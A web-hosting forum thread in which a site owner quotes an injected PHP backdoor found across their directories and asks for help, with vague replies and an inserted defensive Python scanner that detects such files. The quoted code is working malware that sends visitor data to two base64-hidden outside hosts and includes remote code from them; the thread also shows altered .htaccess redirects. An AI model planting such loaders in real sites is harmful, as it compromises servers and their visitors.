Hello, I am currently baffled by something which is happening on a hosting account. Files have been appearing in each sub-directory of public_html with names like 4504.php, for example. The file contents are:

PHP:

    <? error_reporting ;
    $s="e";
    $a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
    $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
    $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
    $d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
    $e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
    $f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
    $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
    $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
    $i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
    $j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
    $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j);
    if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){}
    else {include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str);}
    ?>

The .htaccess files in the folders change as well, for example:

Code (markup):

    Options -MultiViews
    ErrorDocument 404 //radio/74539.php

I have never seen this before. The host of the server seems to think it is a PHP Injection. However, it has done it before previously on another domain. Has anyone seen it before or know what it is? Any help would be great.
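A defensive check for the two artifacts described in the post above (dropped .php files that include() a base64-decoded target, and .htaccess files whose 404 handler points at a numeric-named .php file), added here as an example and not part of the original thread. The function names, the sample tree and the host example.invalid are constructed for illustration.

```python
import base64
import re
import tempfile
from pathlib import Path

# A quoted string literal passed to base64_decode().
B64_CALL = re.compile(r"""base64_decode\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)""")
# include/require whose argument starts with base64_decode(): hidden include target.
ENCODED_INCLUDE = re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*base64_decode\(")
# .htaccess 404 handler pointing at a numeric-named .php file.
HTACCESS_404 = re.compile(r"^\s*ErrorDocument\s+404\s+\S*/\d+\.php\s*$", re.M)

def decode_literals(source):
    """Decode each base64 string literal so the hidden URL parts become visible."""
    out = []
    for literal in B64_CALL.findall(source):
        try:
            out.append(base64.b64decode(literal, validate=True).decode("utf-8", "replace"))
        except ValueError:
            continue  # not valid base64, skip it
    return out

def scan_tree(root):
    """Return (path, reason, decoded_strings) for each suspicious file under root."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file():
            continue
        text = path.read_text(errors="replace")
        if path.name == ".htaccess" and HTACCESS_404.search(text):
            findings.append((path, "404 handler points at numeric .php", []))
        elif path.suffix == ".php" and ENCODED_INCLUDE.search(text):
            reason = "include() of base64-decoded target"
            if path.stem.isdigit():
                reason += ", numeric file name"
            findings.append((path, reason, decode_literals(text)))
    return findings

def build_sample(root):
    """Constructed sample tree: one clean page, one dropper, one altered .htaccess."""
    enc = lambda s: base64.b64encode(s.encode()).decode()
    radio = Path(root, "radio")
    radio.mkdir()
    (radio / "index.php").write_text("<?php echo 'hello'; ?>")
    (radio / "74539.php").write_text(
        '<? if ((include(base64_decode("%s").base64_decode("%s")."/?".$str))){} ?>'
        % (enc("http://"), enc("example.invalid")))
    (radio / ".htaccess").write_text("Options -MultiViews\nErrorDocument 404 //radio/74539.php\n")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for path, reason, decoded in scan_tree(tmp):
            print(path.relative_to(tmp), "|", reason, "|", decoded)
```

Point `scan_tree` at a copy of public_html to list every affected directory; the decoded strings show where each dropped file tries to load code from.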
If it is a php injection it would probably be done through a contact form. Have you received any unusual messages through an online contact form?
I think that your host should be able to give you more to go on than "seems to think it is a PHP Injection". That 'seems' a little vague to me. Have you looked through the code on any of your pages for anything that seemed out of place? Sorry, I can't be more specific as I am not sure yet what is happening and since I do not have access to the site it is hard to say what it is. What is the url? If you don't want to post it publicly you may PM me.
I used "view source" to look through the code and I did not see anything that was out of place either. Hopefully there will be some others who will read this thread that may have some suggestions.